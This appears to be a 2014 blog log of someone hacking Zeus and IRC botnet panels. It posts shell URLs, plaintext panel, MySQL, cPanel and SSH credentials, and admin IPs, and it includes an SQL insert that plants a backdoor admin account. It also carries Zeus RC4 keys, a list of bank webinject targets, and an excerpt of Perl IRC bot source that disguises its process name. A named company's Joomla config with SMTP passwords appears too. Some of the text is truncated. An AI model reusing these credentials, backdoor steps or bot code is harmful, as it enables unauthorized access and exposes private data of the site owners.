//shell
hxxp://www.ghandigameh.org/wkv3.php
passwd : its-ownz
// mysql
// MySQL connection settings as posted (presumably the panel's config.php):
// host, user, password and database are stored in plaintext.
// The same password is reused by the other two panels on this host listed further down.
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'ghandiga_timbod';
$config['mysql_pass'] = 'cecelle222';
$config['mysql_db'] = 'ghandiga_timbod';
// zeus panel
hxxp://www.ghandigameh.org/timbod/cp.php
user : its-ownz
pass : 123456
// mysql
// Second panel on the same host: separate MySQL user and database,
// but the same plaintext password as the first panel.
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'ghandiga_okpokoa';
$config['mysql_pass'] = 'cecelle222';
$config['mysql_db'] = 'ghandiga_okpokoa';
// zeus panel
hxxp://www.ghandigameh.org/okpokoa/cp.php
user : its-ownz
pass : 123456
// mysql
// Third panel on the same host: again a separate MySQL user/database
// sharing the same password as the other two.
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'ghandiga_mumbas';
$config['mysql_pass'] = 'cecelle222';
$config['mysql_db'] = 'ghandiga_mumbas';
// zeus panel
hxxp://www.ghandigameh.org/mumbas/cp.php
user : its-ownz
pass : 123456
// login was
admin ip = 41.220.69.209
admin 6a74c2362a925e5dc22f82a285d44aa5 (md5 hash)
// added via mysql thu ..
-- Row added to the panel's cp_users table: a second account ('its-ownz', id 2)
-- with flag_enabled and every r_* right column set to '1'. The pass column is an
-- unsalted MD5; e10adc3949ba59abbe56e057f20f883e is the MD5 of '123456' (this post's
-- own "pass : 123456" lines and the danbeta.ru entry below confirm the mapping).
-- From an analyst's side, an unexpected cp_users row like this is a sign the panel
-- has been taken over by a third party.
INSERT INTO `cp_users` ( `id`, `name`, `pass`, `language`, `flag_enabled`, `comment`, `ss_format`, `ss_quality`, `r_edit_bots`, `r_stats_main`, `r_stats_main_reset`, `r_stats_os`, `r_botnet_bots`, `r_botnet_scripts`, `r_botnet_scripts_edit`, `r_reports_db`, `r_reports_db_edit`, `r_reports_files`, `r_reports_files_edit`, `r_reports_jn`, `r_system_info`, `r_system_options`, `r_system_user`, `r_system_users` ) VALUES ( '2', 'its-ownz', 'e10adc3949ba59abbe56e057f20f883e', 'en', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1', '1' );
Thursday, October 30, 2014
Zeus - ghandigameh.org - Hacked
Zbot - vinltd.com - Hacked
// zeus panel
hxxp://vinltd.com/suz/cp.php
user : admin
pass : profyle187
// mysql
// MySQL connection settings as posted. Note the database password is the
// same string as the panel login password quoted just above (password reuse).
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'vinltdco_suz';
$config['mysql_pass'] = 'profyle187';
$config['mysql_db'] = 'vinltdco_suz';
// shell
hxxp://vinltd.com/info.php
// note account suspended !
Zbot - ns2.ezhost.in - Login
// zeus panel 1
user : admin
pass : london
login : hxxp://ns2.ezhost.in/ca/serverphp/cp.php
// zeus panel 2
user : admin
pass : london
hxxp://ns2.ezhost.in/images/us/serverphp/cp.php
// zeus panel 3
user : admin
pass : london
hxxp://ns2.ezhost.in/images/online/serverphp/cp.php
// php panel
hxxp://ns2.ezhost.in/ca.zip
hxxp://ns2.ezhost.in/images.zip
NOTE : added a second admin user to all panels
user : its-ownz
pass : 123456
ZeusBot - newbetrrsearve.co.uk - Hacked
// Panel
hxxp://newbetrrsearve.co.uk/usa/serverphp/cp.php
// login
user : admin
pass : london
// have fun
Monday, October 27, 2014
rageBot - 1war.hopto.org - Owned ( lol )
* Connecting to 1war.hopto.org (94.75.255.77) port 6667...
* Connected. Now logging in...
* *** Checking ident...
* *** No ident response; username prefixed with ~
* You have not registered
* Received a CTCP VERSION from IRC
<< 332 [nLh-VNC]szedsp ##vampir## :+scan 60 1 201 -b 3
<< 333 [nLh-VNC]szedsp ##vampir## Vampir 1413995814
<< 353 [nLh-VNC]szedsp @ ##vampir## :[nLh-VNC]szedsp [nLh-VNC]edmhip [nLh-VNC]aueejn [nLh-VNC]zabbni [nLh-VNC]yffqig [nLh-VNC]lrstbw [nLh-VNC]camwpi [nLh-VNC]wikcfh [nLh-VNC]vtsgjy [nLh-VNC]gyryte [nLh-VNC]tkarol [nLh-VNC]pwzrlf +MissaK|NS| [nLh-VNC]idiswr @nitZ [nLh-VNC]hkzqij
<< 366 [nLh-VNC]szedsp ##vampir## :End of /NAMES list.
<< PRIVMSG [nLh-VNC]szedsp :\x01VERSION\x01
>> PRIVMSG ##vampir## :\x02[RAGE SCAN:]\x02 range: 201/60 threads.
Sunday, October 26, 2014
Zeus Botnet - 46.22.173.133 - Owned
hxxp://46.22.173.133/boom/cp.php?letter=home
// MySQL connection settings as posted: the panel connects as the MySQL 'root' account.
// The last line is truncated in this copy (unterminated string literal) and is not runnable as is.
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'root';
$config['mysql_pass'] = 'thanks22';
$config['mysql_db'] = 'prince';
$config['reports_path'] = '_fe
we are in
// prince
admin 607cbd481652995c869ca3d08252df0e = favour123
// doom
admin 0192023a7bbd73250516f069df18b500 = admin123
// zeus panel + builder found on his pc
hxxp://www.datafilehost.com/d/863b03f7
pass : itsownz
// malware
c5b2ef451c3fc351401f07d12b48240a md5 hash
search for it at malwr.com
// extracted from Xylitol, thanks
Malware family ZEUS
MD5 0b68b3c971fb4109094b1437e15e258b
Version 2.1.0.1
RC4 Keystream [value not present in this copy]
gate.php URLs
hxxp://46.22.173.133/prince/secure.php
URLs
hxxp://46.22.173.133/prince/config.bin
Zeus Bot - cmbonline.in - Hacked
config.php |
hxxp://cmbonline.in/
// login
// user : admin2
// pass : admin
hxxp://cmbonline.in/wp-admin/css/colors/admin1/cp.php
// shell
hxxp://cmbonline.in/wp-admin/css/colors/admin1/install/info.php
// other bots found from that
user=admin
pass=ENUGU042
hxxp://coco-bomgo.ru/wordpress/wp-admin/images/admin2/php/cp.php?m=login
hxxp://www.ostarinduztry.com/wp-includes/ID3/larger/php/cp.php?m=login
// have fun
Tuesday, October 21, 2014
Some Perl Bots !!
http://pastebin.com/nZ3bVpRL
http://pastebin.com/YMycf3M9
http://pastebin.com/YXue9AaS
Zeus - danbeta.ru - Owned
// shell
hxxp://danbeta.ru/tools/test.php
// database
// MySQL connection settings as posted (plaintext credentials); the three
// panel paths g1/g2/g5 on this host are listed just below, each with its
// admin row's unsalted MD5 and the matching password.
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'atbdmyas_g11';
$config['mysql_pass'] = 'bobychenko123';
$config['mysql_db'] = 'atbdmyas_g11';
// hxxp://danbeta.ru/g1/cp.php
admin eb87eddd58fed286c508db92d0fe4808 MD5 : omwengho123
// hxxp://danbeta.ru/g2/cp.php
admin e10adc3949ba59abbe56e057f20f883e MD5 : 123456
// hxxp://danbeta.ru/g5/cp.php
admin 18365e47dd8d8ca5ac6b40e3cd8fbd52 MD5 : lucky2014
// Admin ip
212.215.228.143 - - [07/Oct/2014:23:40:48 -0400] "GET /g5/cp.php?m=login HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0"
49.125.235.3 - - [07/Oct/2014:23:41:14 -0400] "GET /g5/cp.php?m=login HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko
[client] cpanel /
password=lYm4d9h0K /
user=atbdmyas
ssh key : QulzAs#Tc^Ut
Wednesday, October 8, 2014
Zeus Bot - icbcasia.info - Exposed
// Thanks to Xylitol
Malware family ZEUS
MD5 6256b5aaad73fa043223ea681bbce823
Version 2.1.0.1
RC4 Keystream 650839bd99761a57d4a87289cf4e0254d852d320cd50c9fee3498e30f5fba
e7129a641833a91be61b14d9492d78d1573002b9b680d7a48d0a43b1f0a70381bce8747457b
2fe18c56148804b0c5a5f7c444320b58177d03db3f95b83eea2882ed339c6bd14a7f249dd66
f3578deb546af6326e734a1b3c055eba28bbafc2e1305539f6642b6adffbb22606a80ee75d9
9027fa4b194ff1ec59ca6d69f89a1c2d3db29ed2817c6ee2f2c8c1c6255eda6c93a097fde05db
72a4cbc74c7a7101ef6f0980fe411b4b98636621d640cdcf4967e6779f351f931e52101e6d58a
c2aa2c07e8cb16bfab3c848506ef40cc77dd4323185ce937a95a8f125f090e5bdfa3c3ac
gate.php URLs
hxxp://icbcasia.info/7/serverphp/gate.php
URLs
hxxp://icbcasia.info/7/serverphp/cfg.bin
Webinjects
hxxps://www.ccm.es/cgi-bin/INclient_6105
hxxps://www.caja-granada.es/cgi-bin/INclient_2031
hxxps://home.ybonline.co.uk/login.html*
hxxps://www.nwolb.com/Login.aspx*
hxxps://online-business.lloydstsb.co.uk/customer.ibc
hxxps://online-offshore.lloydstsb.com/customer.ibc
hxxp://www.hsbc.co.uk/1/2/personal/internet-banking*
hxxps://www.dab-bank.com*
hxxps://probanking.procreditbank.bg/main/main.asp*
hxxps://www.citibank.de*
hxxps://ibank.barclays.co.uk/olb/x/LoginMember.do
hxxps://ibank.internationalbanking.barclays.com/logon/icebapplication*
hxxp://caixasabadell.net/banca2/tx0011/0011.jsp
hxxp://*.osmp.ru/
hxxps://www.sabadellatlantico.com/es/*
hxxps://oi.cajamadrid.es/CajaMadrid/oi/pt_oi/Login/login
hxxps://www.caixagirona.es/cgi-bin/INclient_2030*
hxxps://www.unicaja.es/PortalServlet*
hxxps://areasegura.banif.es/bog/bogbsn*
hxxps://www.bgnetplus.com/niloinet/login.jsp
hxxps://www.caixalaietana.es/cgi-bin/INclient_2042
hxxps://www.cajacirculo.es/ISMC/Circulo/acceso.jsp
hxxps://www.cajabadajoz.es/cgi-bin/INclient_6010*
hxxps://extranet.banesto.es/npage/OtrosLogin/LoginIBanesto.htm
hxxps://www.e-gold.com/acct/li.asp
hxxps://www.fibancmediolanum.es/BasePage.aspx*
hxxps://online.wellsfargo.com/das/cgi-bin/session.cgi*
hxxps://www.wellsfargo.com/*
*/my.ebay.com/*CurrentPage=MyeBayPersonalInfo*
*.ebay.com/*eBayISAPI.dll?*
hxxps://www.us.hsbc.com/*
hxxps://home.cbonline.co.uk/login.html*
hxxps://welcome27.co-operativebank.co.uk/CBIBSWeb/start.do
hxxps://welcome23.smile.co.uk/SmileWeb/start.do
hxxps://www.halifax-online.co.uk/_mem_bin/formslogin.asp*
hxxps://online.wellsfargo.com/login*
hxxps://online.wellsfargo.com/signon*
hxxps://www.e-gold.com/acct/balance.asp*
hxxps://intelvia.cajamurcia.es/2043/entrada/01entradaencrip.htm
hxxps://banca.cajaen.es/Jaen/INclient.jsp
hxxps://www.cajavital.es/Appserver/vitalnet*
hxxps://www.caixaontinyent.es/cgi-bin/INclient_2045
hxxps://web.da-us.citibank.com/cgi-bin/citifi/portal/l/autherror.do*
hxxps://www.cajacanarias.es/cgi-bin/INclient_6065
hxxps://montevia.elmonte.es/cgi-bin/INclient_2098*
hxxps://www.gruppocarige.it/grps/vbank/jsp/login.jsp
hxxps://oie.cajamadridempresas.es/CajaMadrid/oie/pt_oie/Login/login_oie_1
hxxps://privati.internetbanking.bancaintesa.it/sm/login/IN/box_login.jsp
hxxps://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp
hxxps://www.iwbank.it/private/index_pub.jhtml*
hxxps://hb.quiubi.it/newSSO/x11logon.htm
hxxps://www.isideonline.it/relaxbanking/sso.Login*
hxxps://web.secservizi.it/siteminderagent/forms/login.fcc
hxxps://rupay.com/index.php
hxxps://www.53.com/servlet/efsonline/index.html*
hxxps://www.suntrust.com/portal/server.pt*parentname=Login*
hxxps://onlinebanking.nationalcity.com/OLB/secure/AccountList.aspx
hxxps://www#.citizensbankonline.com/*/index-wait.jsp
hxxps://easyweb*.tdcanadatrust.com/servlet/*FinancialSummaryServlet*
hxxps://www#.usbank.com/internetBanking/LoginRouter
hxxps://www.paypal.com/*/webscr?cmd=_login-done*
hxxps://www.paypal.com/*/webscr?cmd=_account
hxxps://www.clavenet.net/cgi-bin/INclient_7054
hxxps://www.cajasoldirecto.es/2106/*
hxxps://www.cajalaboral.com/home/acceso.asp
hxxps://carnet.cajarioja.es/banca3/tx0011/0011.jsp
hxxps://www.caixatarragona.es/esp/sec_1/oficinacodigo.jsp
hxxps://www.cajadeavila.es/cgi-bin/INclient_6094
hxxps://onlineeast#.bankofamerica.com/cgi-bin/ias/*/GotoWelcome
hxxps://web.da-us.citibank.com/*BS_Id=MemberHomepage*
*banquepopulaire.fr/*
hxxps://light.webmoney.ru/default.aspx
hxxps://www.isbank.com.tr/Internet/ControlLoader.aspx*
hxxps://light.webmoney.ru/default.aspx
*wellsfargo.com/*
hxxps://online*.lloydstsb.co.uk/logon.ibc
hxxps://home.ybonline.co.uk/ral/loginmgr/*
hxxps://www.mybank.alliance-leicester.co.uk/login/*
hxxps://www.ebank.hsbc.co.uk/main/IBLogon.jsp
hxxps://scrigno.popso.it*
hxxps://www.halifax-online.co.uk/MyAccounts/MyAccounts.aspx*
hxxps://ibank.barclays.co.uk/olb/x/LoginMember.do
hxxps://www.halifax-online.co.uk/_mem_bin/*
hxxps://resources.chase.com/MyAccounts.aspx
hxxps://bancaonline.openbank.es/servlet/PProxy?*
hxxps://online.wamu.com/Servicing/Servicing.aspx?targetPage=AccountSummary
hxxps://onlinebanking#.wachovia.com/myAccounts.aspx?referrer=authService
hxxps://empresas.gruposantander.es/WebEmpresas/servlet/webempresas.servlets.*
hxxps://www.gruposantander.es/bog/sbi*?ptns=acceso*
hxxps://extranet.banesto.es/*/loginParticulares.htm
hxxps://banesnet.banesto.es/*/loginEmpresas.htm
hxxps://web.da-us.citibank.com/cgi-bin/citifi/portal/l/l.do
hxxps://www2.bancopopular.es/AppBPE/servlet/servin*
hxxps://www.bbvanetoffice.com/local_bdno/login_bbvanetoffice.html
hxxps://www.bancajaproximaempresas.com/ControlEmpresas*
hxxps://home2ae.cd.citibank.ae/CappWebAppAE/producttwo/capp/action/signoncq.do
hxxps://www.nwolb.com/Login.asp*
hxxps://lot-port.bcs.ru/names.nsf?#ogin*
hxxps://www.bancoherrero.com/es/*
hxxps://pastornetparticulares.bancopastor.es/SrPd*
hxxps://internetbanking.aib.ie/hb1/roi/signon
hxxps://www.uno-e.com/local_bdnt_unoe/Login_unoe2.html
hxxps://olb2.nationet.com/signon/signon*
hxxps://banking*.anz.com/*
hxxps://www.rbsdigital.com/Login.asp*
*//mail.yandex.ru/
*//mail.yandex.ru/index.xml
*//money.yandex.ru/
*//money.yandex.ru/index.xml
hxxps://cardsonline-consumer.com/RBSG_Consumer/VerifyLogin.do
hxxps://www*.banking.first-direct.com/1/2/*
hxxps://olb2.nationet.com/MyAccounts/frame_MyAccounts_WP2.asp*
Tuesday, October 7, 2014
1k Perl Bot - 94.102.63.238 -
// botnet source excerpt ( comment for the full source )
# Perl IRC-bot configuration excerpt as posted; the rest of the script is not shown.
# First the connection parameters, then signal handling and process-name masking.
my $linas_max='2';
my $sleep='5';
my @adms=("X", "Y");            # admin nicks - placeholders "X"/"Y" in this copy; TODO confirm against the full source
my @hostauth=("localhost");     # presumably the hosts allowed to control the bot - verify in the full source
my @canais=("#new");            # IRC channel(s) to join
my $nick='PHP';                 # nick and ircname chosen to look like a PHP process
my $ircname ='PHP';
chop (my $realname = `uname -sr`);   # the IRC "real name" field carries the host's kernel/OS string
$servidor='94.102.63.238' unless $servidor;   # default server (not declared with 'my'); the nmap output below shows IRC on port 443 there
my $porta='443';                # port 443, so the IRC traffic blends in with HTTPS on the wire
my $VERSAO = '0.5';
# INT, HUP, TERM and CHLD are ignored, so a plain kill/hangup does not stop the process
# (SIGKILL cannot be ignored). 'PS' is not a standard signal name.
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;                 # compile-time imports, placed after the assignments as in the original
use Socket;
use IO::Select;
chdir("/");                     # leave the launch directory
$servidor="$ARGV[0]" if $ARGV[0];   # first command-line argument overrides the server address
# $0 is the process name shown by ps: it is overwritten with an apache-looking path repeated 16 times.
# The byte after the closing quote is mangled in this copy - TODO confirm against the original.
# For detection: a perl interpreter whose ps name reads like an apache path is the giveaway.
$0="'/usr/sbin/apache/log'�"x16;
* Connecting to 94.102.63.238 port 443...
* There are 1 users and 1097 invisible on 1 servers
* 1 :operator(s) online
* 25 :unknown connection(s)
* 5 :channels formed
* I have 1098 clients and 0 servers
* 1098 4012 :Current local users 1098, max 4012
* 1098 1112 :Current global users 1098, max 1112
* Nmap scan report for hosted-for-minecraft.net (94.102.63.238)
Host is up (0.071s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:c1:7e:70:09:2d:c2:41:fa:67:f4:2a:7e:50:1a:f0 (DSA)
| 2048 8c:d7:ca:73:31:c3:47:b3:54:70:27:be:ec:5c:70:91 (RSA)
|_ 256 58:d3:27:7a:7b:1a:1b:56:8c:2a:07:42:e1:24:91:90 (ECDSA)
25/tcp filtered smtp
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
135/tcp filtered msrpc
443/tcp open irc Unreal ircd
| irc-info:
| server: irc.foonet.com
| version: Unreal3.2.10.1. irc.foonet.com
| servers: 1
| ops: 1
| chans: 5
| users: 1100
| lservers: 0
| lusers: 1100
| uptime: 0 days, 18:06:24
| source host: 7DE75DA1.C67917B8.7CED0DBF.IP
|_ source ident: nmap
Service Info: Host: irc.foonet.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
NetRange: 94.0.0.0 - 94.255.255.255
CIDR: 94.0.0.0/8
OriginAS:
NetName: 94-RIPE
NetHandle: NET-94-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2007-07-30
Updated: 2009-05-18
Ref: http://whois.arin.net/rest/net/NET-94-0-0-0-1
OrgName: RIPE Network Coordination Centre
OrgId: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
RegDate:
Updated: 2013-07-29
Ref: http://whois.arin.net/rest/org/RIPE
ReferralServer: whois://whois.ripe.net:43
OrgTechHandle: RNO29-ARIN
OrgTechName: RIPE NCC Operations
OrgTechPhone: +31 20 535 4444
OrgTechEmail: hostmaster@ripe.net
OrgTechRef: http://whois.arin.net/rest/poc/RNO29-ARIN
OrgAbuseHandle: ABUSE3850-ARIN
OrgAbuseName: Abuse Contact
OrgAbusePhone: +31205354444
OrgAbuseEmail: abuse@ripe.net
OrgAbuseRef: http://whois.arin.net/rest/poc/ABUSE3850-ARIN
Thursday, October 2, 2014
Video - Owning pBot - Server
Some kids run pBot and UnrealIRCd on some vulnerable/hijacked server :P
Malware hosted on FlinkISO server - www.flinkiso.com
// Link
http://www.flinkiso.com/
hxxp://www.flinkiso.com/phpinfo.php
// Admins
Super User - flinkadmin - administrator@flinkiso.com -
7bea0b406bc7d4fdca4dcdbfcb1f5eb2:H5BibKf5lSMWLu1K6FHVwIqvVGEwhUFE
Super User - admin - mayureshvaidya@gmail.com - 4df7fd11965981a9d5589689327313da:2Ey844V7o28nTgqTvFo1o23QohMOhiGl
// Admin Path
hxxp://www.flinkiso.com/administrator/
// Configuration.php
class JConfig {
public $offline = '0';
public $offline_message = 'This site is down for maintenance.
We are working on further enhancing your experience. Please check back again soon.';
public $display_offline_message = '1';
public $offline_image = '';
public $sitename = 'www.flinkiso.com';
public $editor = 'none';
public $captcha = '0';
public $list_limit = '20';
public $access = '4';
public $debug = '0';
public $debug_lang = '0';
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'root';
public $password = '';
public $db = 'flinkisobeta';
public $dbprefix = 'm5b0z_';
public $live_site = '';
public $secret = '0gAFlfZPMYlfMfEQ';
public $gzip = '1';
public $error_reporting = 'none';
public $helpurl = 'http://help.joomla.org/proxy/index.php?option=com_help&keyref=Help{major}{minor}:{keyref}';
public $ftp_host = '127.0.0.1';
public $ftp_port = '21';
public $ftp_user = '';
public $ftp_pass = '';
public $ftp_root = '';
public $ftp_enable = '0';
public $offset = 'Asia/Kolkata';
public $mailer = 'mail';
public $mailfrom = 'contact@flinkiso.com';
public $fromname = 'www.flinkiso.com';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = '0';
public $smtpuser = 'contact@flinkiso.com';
public $smtppass = 'Flinkiso@004';
public $smtphost = 'flinkiso.com';
public $smtpsecure = 'none';
public $smtpport = '25';
public $caching = '0';
public $cache_handler = 'file';
public $cachetime = '15';
public $MetaDesc = '';
public $MetaKeys = '';
Wednesday, October 1, 2014
Hacked - 120.63.157.195 - Zeus Bot
// Zeus Malware
hxxps://zeustracker.abuse.ch/monitor.php?host=120.63.157.195
// Control Panel
hxxp://120.63.157.195:8080/webalizer/lampp/papaclick.php
user: admin
pass: admin88